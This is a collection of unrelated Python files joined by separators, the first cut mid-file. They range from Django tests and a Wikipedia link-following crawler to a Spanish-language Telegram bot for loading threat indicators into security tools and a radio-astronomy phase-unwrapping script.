msg['time'] = time.time()
global database
new_state = database.update(msg, msg['id'])
print("NEW STATE", new_state)
def analyse_db():
print('post Request::DB STATE ...')
|
# marca centenario RJ
# functions
def draw_lines(points, t):
# set state
autoclosepath(True)
nofill()
stroke(0)
strokewidth(t)
# draw
beginpath()
_moveto = True
for point in points:
x, y = point
if _moveto:
moveto(x, y)
_moveto = False
else:
lineto(x, y)
endpath()
def draw_points(points, point_size):
# set state
fill(1, 0, 0)
nostroke()
# draw
for point in points:
x, y = point
oval(x-(point_size/2), y-(point_size/2), point_size, point_size)
# parameters
w = h = 448
x, y = w/2, h/2
d = 48
axis = 158
s = 22
t = 23
_draw_points = True
# points
_points = [
( x - axis, y - d ),
( x + axis, y - d ),
( x + d, y - axis ),
( x + d, y + axis ),
( x + axis, y + d ),
( x - axis, y + d ),
( x - d, y + axis ),
( x - d, y - axis ),
]
# draw
size(w, h)
draw_lines(_points, t)
if _draw_points:
draw_points(_points, s)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# df = pd.read_csv('test.csv')
# df = pd.read_csv ('test.csv', na_values = ['-','not available']) # '-' dan 'not available' diubah jadi NaN
df = pd.read_csv('test.csv', na_values={ #ubah per column (better ubah semuanya jadi Nan)
'nama':'-',
'usia':['-','not available',-1],
'job':['-','not available']
}
)
# df = df.fillna(0) #ubah NaN jadi data yang ada di dalam kurung()
# df = df.fillna({ #per column
# 'nama' : 'Anonim',
# 'usia' : 20,
# 'job' : 'Staff'
# })
# df = df.fillna(method='ffill',axis=1) #yang - not avail ambil data dari index sebelumnya di kolom yang sama.
# df = df.fillna(method='bfill',axis=1) #yang - not avail ambil data dari index setelahnya di kolom yang sama.
# df = df.interpolate().fillna({ #ambil data rata2 dari atas bawah (kira2)
# 'nama':'Anonim',
# 'usia': 20,
# 'job':'Jobless'
# })
# df = df.dropna() #kalo ada Nan dibuang datanya
# df = df.dropna(how='all') #yang index nya semua datanya kosong akan dibuang
# df = df.dropna(thresh=1) #yang ditampilkan hanya data yang minimal 1 kolom terisi
df = df.dropna(subset=['job']) #kalau kolom job ada NaN nya, dibuang
print(df) |
# -*-coding:utf8-*-
from django.shortcuts import render_to_response
# Create your views here.
def login(request):
pass
|
x=0
def setup ():
size (400 , 400)
def draw ():
for x in range(5):
circle(random (0 , 400 ),random (0 , 400),10)
|
# -*- coding: utf-8 -*-
"""
Start on random article on Wikipedia and follow the first link
on main body of article that is not within parentheses or italicized,
repeating for each subsequent article until finding Philosophy page.
Stores 500 starting pages and their path lengths to Philosophy.
Keeps tracks of all visited pages and their path lengths to Philosophy
(to reduce number of http requests).
Path length value is negative if Philosophy wasn't reached.
"""
from bs4 import BeautifulSoup
import requests
import re
import pandas as pd
def remove_paren(text):
"""
Remove parentheses from string if they are outside of tags.
Args:
text (string): All text from article's main section
Returns:
no_paren (string)
>>> remove_paren('This is (remove this) some text.')
This is some text.
>>> remove_paren('Here is <a tag with (parentheses) that> should be left.')
'Here is <a tag with (parentheses) that> should be left.'
>>> remove_paren('Once more (without <this>) <but (with) this>.')
'Once more <but (with) this>.'
"""
paren_depth = 0
tag_depth = 0
no_paren = ''
for i in text:
if paren_depth == 0:
# Tracks tags outside of parentheses
if i == '<':
tag_depth += 1
if i == '>':
tag_depth -= 1
if tag_depth == 0:
# Tracks parentheses outside of tags
if i == '(':
paren_depth += 1
if paren_depth == 0:
no_paren += i
if i == ')':
paren_depth -= 1
else:
# Store characters inside remaining tags
no_paren += i
return no_paren
def valid_url(url):
"""
Checks if url is valid and reformats if needed.
Args:
url (string)
Returns:
url (string): If url contains invalid pattern, returns 'invalid'.
If url is valid, remove section anchor (if needed) and
returns url formatted as: 'http://en.wikipedia.org/wiki/some_page'.
>>> valid_url('https://en.wikipedia.org/w/index.php?title=Burt_P._Lynwood&action=edit&redlink=1')
'invalid'
>>> valid_url('/wiki/Help:IPA_for_English')
'invalid'
>>> valid_url('#cite_note-3')
'invalid'
>>> valid_url('/wiki/Acacia')
'http://en.wikipedia.org/wiki/Acacia'
>>> valid_url('/wiki/Land#Land_mass')
'http://en.wikipedia.org/wiki/Land'
>>> valid_url('https://en.wikipedia.org/wiki/Class_(biology)')
http://en.wikipedia.org/wiki/Class_(biology)
"""
invalid_patterns = ['#cite',
'wikt:',
'wiktionary',
'redlink=',
'File:',
'Help:',
'Special:',
'Category:',
'Template:',
'Portal:',
'Wikipedia:',
'File talk:',
'Help talk:',
'Special talk:',
'Category talk:',
'Template talk:',
'Portal talk:',
'Wikipedia talk:',
'wikimedia']
for pattern in invalid_patterns:
if pattern in url:
return 'invalid'
octothorpe = url.find('#')
if octothorpe != -1:
url = url[:octothorpe]
if url.startswith('https') and (url.find('wiki') != -1):
url = 'http' + url[5:]
return url
if url.startswith('/wiki/'):
url = 'http://en.wikipedia.org' + url
return url
if url.find('wiki') != -1:
return url
else:
return 'invalid' # page outside of wikipedia
def get_next_url(soup):
"""
Finds next valid link in given page.
Args:
soup (bs4.BeautifulSoup): BeautifulSoup of entire page
Returns:
None if no valid urls found.
valid_url(url) (string): Correctly formatted next link.
"""
# remove all italicized content
for tag in soup.select("i"):
tag.decompose()
text = remove_paren(str(soup.select('div#mw-content-text > p')))
clean_soup = BeautifulSoup(text, "html.parser")
potential_links = clean_soup.find_all('a')
if potential_links is None:
return None
for link in potential_links:
url = link.get('href')
if valid_url(url) != 'invalid':
return valid_url(url)
return None
def get_page_title(soup):
"""Returns title (string) of given page."""
page_title = soup.title.text
end_of_title = page_title.find(' - Wikipedia')
return page_title[:end_of_title]
def find_philo():
"""
Starting on a random wikipedia page, finds Philosophy.
Returns:
int: Length of path, -1 if Philosophy not found (no valid links found,
or search ended in a loop).
this_series (list): List of all pages in order of encounter.
"""
i = 0
this_series = [] # pages encountered in this run
page_title = ''
url = 'http://en.wikipedia.org/w/index.php?title=Special:Random' #random url
philo_url = 'http://en.wikipedia.org/wiki/Philosophy'
r = requests.get(url)
url = r.url
while url != philo_url:
if i > 0:
r = requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
page_title = get_page_title(soup)
if i == 0:
print("--- Starting on: ", page_title, " ---")
else:
print(page_title)
if page_title in this_series:
print("Circular path, ending search.")
return -1, this_series
if page_title in all_pages.page.values:
print("Page already visited, ending search.")
page_idx = all_pages.loc[all_pages.page==page_title].index.tolist()[0]
num = all_pages.get_value(page_idx, 'count')
if num > 0:
print("Philosophy found in ", int(i + num), " steps.")
return i + num, this_series
else:
return -1, this_series
("Failed to find Philosophy.")
this_series.append(page_title)
url = get_next_url(soup)
if url is None:
print("No valid links found, ending search.")
return -1, this_series
i += 1
print("Philosophy found in ", i, " steps.")
return i, this_series
all_pages = pd.DataFrame(columns=['page', 'count']) # cache including all pages encountered
starting_pages = pd.DataFrame(columns=['page', 'count']) # starting pages and their path lengths
i = 0
for i in range(500):
count, this_series = find_philo()
starting_pages = starting_pages.append({"page": this_series[0], "count": count}, ignore_index=True)
for page in this_series:
all_pages = all_pages.append({"page": page, "count": count}, ignore_index=True)
count -= 1
print("Search done!")
distribution_all = starting_pages['count']
dist_end_in_philo = starting_pages[starting_pages['count'] >= 0]['count']
print("-----------------------------------------")
print(len(dist_end_in_philo), "/500 pages found Philosophy.")
print("Path lengths mean: ", dist_end_in_philo.mean())
print("Standard deviation: ", dist_end_in_philo.std())
print("Maximum: ", dist_end_in_philo.max())
print("Minimum: ", dist_end_in_philo.min())
print("Top five path lengths:")
print("Length | Count",)
print(dist_end_in_philo.value_counts().head())
# Store values for further analysis
starting_pages.to_csv('save/starting_pages.csv')
all_pages.to_csv('save/all_pages.csv')
dist_end_in_philo.to_csv('save/dist_end_in_philo.csv')
|
import logging
from datetime import datetime
from .exceptions import DoesNotExist, MultipleObjectsReturned
from .data import language_codes
logger = logging.getLogger(__name__)
class Model(object):
def __init__(self, data, collection):
self._collection = collection
self.conn = collection.conn
self.data = self.format_data(self.set_defaults(data))
self.doc_type = self._collection.doc_type
self.index = self._collection.index
def _index(self, **kwargs):
if 'force_new' in kwargs or 'id' not in kwargs:
kwargs['op_type'] = 'create'
del kwargs['force_new']
kwargs['index'] = self.index
kwargs['doc_type'] = self.doc_type
if 'id' not in kwargs:
kwargs['refresh'] = True
return self.conn.index(**kwargs)
def save(self, upsert_params = [], force_new=False, refresh=False):
if force_new:
return self._index(body=self.data, force_new=True, refresh=refresh)
else:
return self.upsert(params=upsert_params, refresh=refresh)
def upsert(self, params = [], refresh=False):
if params:
try:
doc = self._collection.get(params)
return self._index(body=self.data, id=doc['id'],
refresh=refresh)
except DoesNotExist:
logger.info("Did not find doc for " + str(params))
return self._index(body=self.data, force_new=True,
refresh=refresh)
except MultipleObjectsReturned:
logger.info("Got more than one object for "+str(params))
return None
else:
return self._index(body=self.data, force_new=True,
refresh=refresh)
def format_data(self, data):
return data
def set_defaults(self, data):
return data
class Item(Model):
def set_defaults(self, data):
defaults = {
'license': 'unknown',
'lifespan': 'temporary',
'createdAt': datetime.now()
}
for key,val in defaults.iteritems():
if key not in data:
data[key] = val
return data
def save(self, refresh=False):
upsert_params = [
{
'field':'remoteID',
'value': self.data['remoteID']
},
{
'field': 'source',
'value': self.data['source']
}
]
return super(Item, self).save(upsert_params=upsert_params,
refresh=refresh)
def format_data(self, data):
data['updatedAt'] = datetime.now()
if 'publishedAt' not in data:
data['publishedAt'] = data['createdAt']
if 'language' in data and 'code' in data['language']:
if data['language']['code'] in language_codes.codes:
data['language'] = language_codes[data['language']['code']]
if 'summary' not in data and 'content' in data:
if len(data['content']) <= 100:
data['summary'] = data['content']
else:
data['summary'] = data['content'][0:97]+'...'
search_text = ''
if 'summary' in data:
search_text += data['summary']
if 'content' in data:
search_text += ' ' + data['content']
if 'tags' in data:
tag_text = ' '.join([x['name'] for x in data['tags']])
search_text += tag_text
data['searchText'] = search_text
return data
|
from django.test import TestCase
from django.urls import reverse
from .models import meeting, meetingminutes, resource, event
from .views import newResource, getresources
from django.contrib.auth.models import User
# Tests the 'meeting' model
class MeetingTitleTest(TestCase):
def test_string(self):
meet=meeting(meetingtitle="Meeting 1")
self.assertEqual(str(meet), meet.meetingtitle)
def test_table(self):
self.assertEqual(str(meeting._meta.db_table), 'title')
# Tests the 'meetingminutes' model
class MeetingMinutesTest(TestCase):
def test_string(self):
meet=meetingminutes(minutestext="Minutes Text")
self.assertEqual(str(meet), meet.minutestext)
def test_table(self):
self.assertEqual(str(meetingminutes._meta.db_table), 'meetingminutes')
# Tests the 'resource' model
class ResourceTest(TestCase):
def test_string(self):
res=resource(resourcename="Resource 1")
self.assertEqual(str(res), res.resourcename)
def test_table(self):
self.assertEqual(str(resource._meta.db_table), 'resource')
# Tests the 'event' model
class EventTest(TestCase):
def test_string(self):
even=event(eventtitle="Event 1")
self.assertEqual(str(even), even.eventtitle)
def test_table(self):
self.assertEqual(str(event._meta.db_table), 'event')
# Tests a logged in user can access the Resource form
class ResourceFormTest(TestCase):
def test_view(self):
self.test_user=User.objects.create_user(username='testuser1', password='P@ssw0rd1')
login=self.client.login(username='testuser1', password='P@ssw0rd1')
response = self.client.get(reverse('newresource'))
self.assertEqual(str(response.context['user']), 'testuser1')
self.assertEqual(response.status_code, 200) #tests view
self.assertTemplateUsed(response, 'pythonclubapp/newresource.html') #tests template |
#! /usr/bin/env python
#__________________________________________________
# pyLorenz/utils/initialisation/
# gaussianindependantinitialiser.py
#__________________________________________________
# author : colonel
# last modified : 2016/10/9
#__________________________________________________
#
# class to handle an initialiser
#
import numpy as np
from ..random.independantgaussianrng import IndependantGaussianRNG
#__________________________________________________
class GaussianIndependantInitialiser(object):
#_________________________
def __init__(self, t_truth = np.zeros(0), t_eg = IndependantGaussianRNG()):
self.setGaussianIndependantInitialiserParameters(t_truth, t_eg)
#_________________________
def setGaussianIndependantInitialiserParameters(self, t_truth = np.zeros(0), t_eg = IndependantGaussianRNG()):
# truth
self.m_truth = t_truth
# error generator
self.m_errorGenerator = t_eg
#_________________________
def initialiseTruth(self):
return np.copy(self.m_truth)
#_________________________
def initialiseSamples(self, t_Ns):
return self.m_truth + self.m_errorGenerator.drawSamples(t_Ns, 0)
#__________________________________________________
|
import os
dirname = os.path.dirname(__file__)
class File_Locations:
local_data_directory = os.path.join(dirname,"data")
"""
Available from https://www.neighborhoodatlas.medicine.wisc.edu/
"""
adi_location = os.path.join(dirname,"data/adi/US_blockgroup_15.txt")
"""
Available from cps.ipums.org
Current variables:
LABFORCE
EMPSTAT
AGE
EDUC
INCWAGE
STATEFIP
CPI99
INCTOT
(ASECWT is included automatically)
"""
cps_toplevel_extract = os.path.join(dirname,"../data/cps/cps_00027.csv")
"""
Local files
"""
mincer_model_location = os.path.join(dirname,"../data/models/mincer.pickle")
mincer_params_location = os.path.join(dirname, "data/mincer_params.pickle")
cpi_adjustments_location = os.path.join(dirname, "data/bls/cpi_adjustment_range.csv")
mean_wages_location = os.path.join(dirname, "data/mean_wages.csv")
hs_mean_wages_location = os.path.join(dirname, "data/hs_grads_mean_wages.csv")
bls_employment_location = os.path.join(dirname, "data/bls/bls_employment_series.csv")
bls_laborforce_location = os.path.join(dirname, "data/bls/bls_laborforce_series.csv")
bls_employment_rate_location = os.path.join(dirname, "data/bls/bls_employment_rate_series.csv")
bls_wage_location = os.path.join(dirname, "data/bls/bls_wage_series.csv")
class Defaults:
min_group_size = 30
class General:
CPS_Age_Groups = ['18 and under','19-25','26-34','35-54','55-64','65+'] |
# -*- coding: utf-8 -*-
"""
Copyright (c) Dario Götz and Jörg Christian Reiher.
All rights reserved.
"""
import threading
import datetime
from keys import *
from config import Config
_CONFIG = Config(__name__)
class JudgingManager(object):
'''
Provides the judging management responsible for keeping track of
which judge requests to judge which heat
'''
def __init__(self):
self._lock = threading.RLock()
self.__judging_requests = {}
def expire_judging_requests(self):
with self._lock:
for heat_id, reqs in self.__judging_requests.items():
now = datetime.datetime.now()
for judge_id, expire_date in reqs.items():
if expire_date < now:
del self.__judging_requests[heat_id][judge_id]
return
def register_judging_request(self, judge_id, heat_id, expire_s=None):
if expire_s:
expire_date = datetime.datetime.now() + datetime.timedelta(seconds=expire_s)
else:
expire_date = None
with self._lock:
self.__judging_requests.setdefault(heat_id, {})[judge_id] = expire_date
return True
def unregister_judging_request(self, judge_id, heat_id):
with self._lock:
try:
del self.__judging_requests[heat_id][judge_id]
except:
print 'judging_manager: Cannot unregister judging request for Heat {} by {}'.format(heat_id, judge_id)
return False
return True
def get_judging_requests(self, heat_id):
self.expire_judging_requests()
res = {}
res.update(self.__judging_requests.get(heat_id, {}))
return res
|
"""Base classes."""
from jupyter_server.extension.handler import ExtensionHandlerMixin
class TerminalsMixin(ExtensionHandlerMixin):
"""An extension mixin for terminals."""
@property
def terminal_manager(self):
return self.settings["terminal_manager"] # type:ignore[attr-defined]
|
from telegram.ext import Updater, CommandHandler, ConversationHandler,CallbackQueryHandler,MessageHandler, Filters
from telegram import InlineKeyboardMarkup,InlineKeyboardButton
import yaml, logging, os
import extract
import pdf_to_text
import telegram
INPUT_TEXT,INPUT_TEXT_C = range(2)
text = ""
INPUT_PDF, INPUT_PDF_C = range(2)
GRUPO = ACA_PONES_TU_CHAT_ID
def start(update, context):
if(update.message.chat.id!=GRUPO): return
logger.info('He recibido un comando start')
update.message.reply_text('¡Bienvenido a nBot %s!. Opciones disponibles: \
\n/ioc - Cargar indicadores modo texto. \
\n/pdf - Cargar indicadores pdf [Beta]. \
\n' % update.message.from_user.name)
def ioc(update, context):
if(update.message.chat.id!=GRUPO): return
update.message.reply_text('Bueno %s, pasame el mensaje asi lo parseo (acordate de anteponer \'/ioc\' al texto)!' % update.message.from_user.name)
return INPUT_TEXT
def pdf(update, context):
if(update.message.chat.id!=GRUPO): return
update.message.reply_text('Bueno %s, pasame el documento pdf asi lo parseo!' % update.message.from_user.name)
return INPUT_PDF
def get_destination_path(path, file_url):
down_file = os.path.join(path, os.path.basename(file_url))
new_file = os.path.join(path, os.path.splitext(
os.path.basename(file_url))[0]) + '.pdf'
return down_file, new_file
def check_document(file_name):
return file_name.endswith('.pdf')
def document_saver(update,context):
if(update.message.chat.id!=GRUPO): return
global text
if update.message.document and check_document(update.message.document.file_name):
doc_file = context.bot.get_file(update.message.document.file_id)
my_path = os.path.abspath(os.path.dirname(__file__))
down, new = get_destination_path(my_path, update.message.document.file_name)
doc = doc_file.download(down)
text=pdf_to_text.convertir(doc)
if os.path.exists(doc):
os.remove(doc)
cantidad = extract.contar(text)
if(cantidad==0):
update.message.reply_text('%s, no encuentro IoC válidos en el documento %s. Recordá que solo acepto SHA1, IPs públicas y dominios' % (update.message.from_user.name, update.message.document.file_name))
if(cantidad>0 and cantidad <= 25):
update.message.reply_text('Se recibieron los IoC de %s, procederé a cargar en nuestras soluciones lo siguiente:\n%s\n ¿Confirmar? /si - /no' % (update.message.document.file_name, extract.buscar(text)))
if(cantidad >25):
update.message.reply_text('Se recibieron %i IoC (no puedo listar en este chat esta cantidad) de %s, procederé a cargarlos en nuestras soluciones de seguridad. \n ¿Confirmar? /si - /no' % (cantidad, update.message.document.file_name))
if(cantidad>0):
return INPUT_PDF_C
return ConversationHandler.END
def confirmar(update,context):
if(update.message.chat.id!=GRUPO): return
global text
if(update.message.text=="/si"):
extract.extraer(text)
#update.message.reply_text('%s, confirmado, se cargaron!' % update.message.from_user.name)
update.message.reply_text('%s, entiendo tu confirmación, pero aun no estoy autorizado a cargar IoC de pdfs!' % update.message.from_user.name)
if(update.message.text=="/no"):
update.message.reply_text('%s, se anulo la carga!' % update.message.from_user.name)
text=""
return ConversationHandler.END
def confirmar_ioc(update,context):
if(update.message.chat.id!=GRUPO): return
global text
if(update.message.text=="/si"):
extract.extraer(text)
#update.message.reply_text('%s, confirmado, se cargaron!' % update.message.from_user.name)
update.message.reply_text('%s, confirmado, se cargaron los IoC' % update.message.from_user.name)
if(update.message.text=="/no"):
print()
update.message.reply_text('%s, se anulo la carga!' % update.message.from_user.name)
text=""
return ConversationHandler.END
def updateIoc(update, context):
if(update.message.chat.id!=GRUPO): return
global text
text = update.message.text
if(extract.buscar(text) != ""):
buttonSI = InlineKeyboardButton (
text='SI',
callback_data='SI'
)
buttonNO = InlineKeyboardButton (
text='NO',
callback_data='NO'
)
update.message.reply_text('Se recibieron los IoC, procederé a cargar en nuestras soluciones lo siguiente:\n%s\n ¿Confirmar?' % extract.buscar(text),reply_markup=InlineKeyboardMarkup([
[buttonSI,buttonNO]
]))
else:
update.message.reply_text('No encuentro IoC válidos en tu mensaje %s. Recordá que solo acepto SHA1, IPs públicas y dominios' % update.message.from_user.name)
return ConversationHandler.END
return INPUT_TEXT_C
def confirmar_ioc_button(update,context):
if(update.callback_query.message.chat.id!=GRUPO): return
global text
print(update)
if(update.callback_query.data=='SI'):
extract.extraer(text)
update.callback_query.message.reply_text('%s, confirmado, se cargaron!' %update.callback_query.message.chat.first_name)
if(update.callback_query.data=='NO'):
update.callback_query.message.reply_text('%s, se anulo la carga!' % update.callback_query.message.chat.first_name)
text=""
return ConversationHandler.END
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger('nAutomaticBot')
""" Llave API para conectarse a Telegram """
updater = Updater(token="YOUR_BOT_TOKEN", use_context=True)
dp = updater.dispatcher
""" Handler's """
dp.add_handler(CommandHandler('start', start))
dp.add_handler(ConversationHandler(
entry_points=[
CommandHandler('ioc', ioc)
],
states={
INPUT_TEXT: [MessageHandler(Filters.text, updateIoc)],
INPUT_TEXT_C: [CallbackQueryHandler(callback=confirmar_ioc_button)]
},
fallbacks=[]
))
dp.add_handler(ConversationHandler(
entry_points=[
CommandHandler('pdf', pdf)
],
states={
INPUT_PDF: [MessageHandler(Filters.document, document_saver)],
INPUT_PDF_C: [MessageHandler(Filters.command, confirmar)]
},
fallbacks=[]
))
updater.start_polling()
updater.idle()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'stylesheets.ui'
#
# by: PyQt4 UI code generator 4.5.4
#
# WARNING! All changes made in this file will be lost!
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import object
from PyQt4 import QtCore, QtGui
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(619, 451)
self.horizontalLayout_2 = QtGui.QHBoxLayout(Form)
self.horizontalLayout_2.setMargin(0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_2 = QtGui.QLabel(Form)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.system = QtGui.QListWidget(Form)
self.system.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
self.system.setTextElideMode(QtCore.Qt.ElideMiddle)
self.system.setObjectName("system")
self.verticalLayout_2.addWidget(self.system)
self.horizontalLayout_2.addLayout(self.verticalLayout_2)
self.addFromSystem = QtGui.QToolButton(Form)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/next.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.addFromSystem.setIcon(icon)
self.addFromSystem.setObjectName("addFromSystem")
self.horizontalLayout_2.addWidget(self.addFromSystem)
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtGui.QLabel(Form)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.addFromFile = QtGui.QToolButton(Form)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/icons/new.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.addFromFile.setIcon(icon1)
self.addFromFile.setObjectName("addFromFile")
self.horizontalLayout.addWidget(self.addFromFile)
self.remove = QtGui.QToolButton(Form)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/icons/close.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.remove.setIcon(icon2)
self.remove.setObjectName("remove")
self.horizontalLayout.addWidget(self.remove)
self.up = QtGui.QToolButton(Form)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/icons/up.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.up.setIcon(icon3)
self.up.setObjectName("up")
self.horizontalLayout.addWidget(self.up)
self.down = QtGui.QToolButton(Form)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/icons/down.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.down.setIcon(icon4)
self.down.setObjectName("down")
self.horizontalLayout.addWidget(self.down)
self.verticalLayout.addLayout(self.horizontalLayout)
self.custom = QtGui.QListWidget(Form)
self.custom.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.custom.setTextElideMode(QtCore.Qt.ElideMiddle)
self.custom.setObjectName("custom")
self.verticalLayout.addWidget(self.custom)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.retranslateUi(Form)
QtCore.QObject.connect(self.system, QtCore.SIGNAL("itemSelectionChanged()"), Form.applyChanges)
QtCore.QObject.connect(self.custom, QtCore.SIGNAL("itemSelectionChanged()"), Form.applyChanges)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(QtGui.QApplication.translate("Form", "Form", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Form", "System StyleSheets:", None, QtGui.QApplication.UnicodeUTF8))
self.addFromSystem.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Form", "Custom StyleSheets:", None, QtGui.QApplication.UnicodeUTF8))
self.addFromFile.setToolTip(QtGui.QApplication.translate("Form", "Add another stylesheet", None, QtGui.QApplication.UnicodeUTF8))
self.addFromFile.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
self.remove.setToolTip(QtGui.QApplication.translate("Form", "Remove selected stylesheet", None, QtGui.QApplication.UnicodeUTF8))
self.remove.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
self.up.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
self.down.setText(QtGui.QApplication.translate("Form", "...", None, QtGui.QApplication.UnicodeUTF8))
import icons_rc
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Form = QtGui.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
|
from django.urls import path
from vkrb.text.views import TextGetView
app_name = 'text'
urlpatterns = [
path('get/', TextGetView.as_view()),
]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 11:20:38 2018
@author: mtech
"""
"""
This programme (should) takes the raw data, sorts it into baselines, averages for repeated data,
undoes the mod 2pi, calculates an array where data needs predicting and prints to a file
for use in a george library process
"""
import numpy as np
import cmath
import matplotlib.pyplot as plt
#import george
#from george import kernels
# import scipy.optimize as op
#function to read in data
def readfile(filename):
#open file
filedata = open(filename, 'r')
#create blank arrays
timestamp, antenna1, antenna2, vis, visuncert, num, flag, phs = ([] for i in range(8))
#while not at the end...
while True:
line = filedata.readline() #read the lines
if not line: break #end infinite loop if no more lines
items = line.split(',') #split the items in each line by ','
#only take unflagged data (tagged as false)
#also only takes calibration data (when num=2)
if any("False" in x for x in items) and (items[5]=='2'):
timestamp.append(float(items[0]))
antenna1.append(float(items[1]))
antenna2.append(float(items[2]))
vis.append(complex(items[3])) #vis is complex
visuncert.append(float(items[4]))
num.append(float(items[5]))
flag.append(str(items[6])) #flag is a string
#turn into normal numpy arrays
timestamp=np.array(timestamp)
antenna1=np.array(antenna1)
antenna2=np.array(antenna2)
vis=np.array(vis)
visuncert=np.array(visuncert)
num=np.array(num)
#calculate phase
for i in range (0,len(vis)):
phs.append(cmath.phase(vis[i])) #calculate phase
#turn from list in nnumpy array
phs=np.array(phs)
return timestamp, antenna1, antenna2, vis, visuncert, num, flag, phs
#********************************************************************************************
#Main
#PARAMETERS TO BE CHANGED:
#CAN CHANGE the i in range 0, len(baselineArrays) on line ~100 to change which baselines to plot data for
phaseDiff = cmath.pi #value that the difference between two phases has to be equal to for the programme to have considered data to have wrapped-around on itself
#Call function to read data
timestamp, antenna1, antenna2, vis, visuncert, num, flag, phs = readfile('A75_data.dat')
#Identify baselines and sort data based on baselines
#Give each baseline a unique number, based on a mathematical mapping
baselines = ((antenna1 + antenna2)*(antenna1 + antenna2 +1))/2 + antenna2
#Zip the baselines, phases and times together for sorting
allThree = np.column_stack((baselines,timestamp, phs))
#sort by the baselines in the first column
allThreeSorted = sorted(allThree,key=lambda x: x[0])
#turn into allThreesorted into numpy array
allThreeSorted = np.array(allThreeSorted)
#split arrays by baseline identifier
baselineArrays=np.split(allThreeSorted, np.where(np.diff(allThreeSorted[:,0]))[0]+1) #split the arrays by when theres a difference in the baseline number
#**********************************************************************************************************
#now get data into correct form and export to a data file
#get an array of the number of baselines
for i in range (0, len(baselineArrays)): #set max to len(baselineArrays) to go to end
#Select a single baseline worth of data for each i in loop
oneBaselineArray = baselineArrays[i]
t=[] #create blank arrays for time and phase
p=[]
for n in range (0,len(oneBaselineArray)):
t.append(oneBaselineArray[n,1]) #fill up time array from 2nd column of this baselines data array
p.append(oneBaselineArray[n,2]) #fill up phase array from 3rd column of this baselines data array
#Convert to numpy arrays
t = np.array(t)
p = np.array(p)
"""
#Plot these if you want
plt.figure()
plt.scatter(t, p)
plt.show()
"""
#Average over values for repeated times
# Now average over repeated times...
# Averaging might have a problem if the two values are ~-pi and pi
#Identify values, location and occurences of each particular timestamp
times, indicies, inverse, occurences = np.unique(t, return_index=True , return_inverse=True, return_counts=True)
phaseAv = []
#Loop over every unique time
for k in range(0,len(times)):
temp = 0
#If the time is repeated, average over all corresponding values
# if occurences[i] != 1:
#Find where the inverse value is repeated and average over these elements of the array
index = np.asarray(np.where(inverse == inverse[k])) #find values, convert to array
#Loop from zero to the number of ocurences
for j in range(0,len(index.T)):
#Check if there has been a wrap-around in the data - if gap between datas is too large (STOPS PHASES AVERAGING TO ROUGHLY ZERO)
if (p[index[0][j]] - p[index[0][j-1]] > phaseDiff or - p[index[0][j]] + p[index[0][j-1]] > phaseDiff ):
#if wrapped arround then add on 2pi before summing
p[index[0][j-1]] = p[index[0][j-1]] + 2*cmath.pi
temp += p[index[0][j]]
else:
#If there is no wraparound in the data sum phase values ready for averaging
temp += p[index[0][j]]
#Add averaged phase values to array
#if the value has come out as bigger than pi then need to wrap it back around
if (temp/len(index.T) > cmath.pi):
av = temp/len(index.T) - 2*cmath.pi
#If the value is reasonable then calculate average as normal
else:
av = temp/len(index.T)
#Add averages to an array
phaseAv.append(av)
#uncomment to plot all figures
plt.figure()
plt.scatter(times, phaseAv)
plt.show()
#Output the data in a form to be used by the GP programme
#Stitch together data arrays and transpose to columns
data = np.array([times, phaseAv])
data = data.T
#Open a .txt file to write to
#format.(i) makes a different file for each baseline thats being looped over
with open("{}datafile.txt".format(i), 'wb+') as datafile_id:
#Write the data, formatted and separated by a comma
np.savetxt(datafile_id, data, fmt=['%.2f','%.2f'], delimiter=',')
#"""
#PARAMETERS TO CHANGE
#standardWrapCheck = 2/3
#timeGap = 200
#fillTimeGap = 1.7
#gapWrapCheck = cmath.pi/2
#sampleRate = 0.86
